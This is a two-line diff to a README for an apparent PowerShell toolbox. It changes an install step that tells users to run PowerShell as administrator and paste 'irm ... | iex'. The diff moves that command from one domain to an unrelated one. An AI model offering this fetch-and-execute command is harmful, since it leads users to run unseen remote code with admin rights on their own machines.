Sudo-Chamroeun/FIS-Toolbox/README.md

 Run Powershell as administrator and past the
-link: "irm fistoolbox.automizze.us | iex"
+link: "irm security.footprints.work | iex"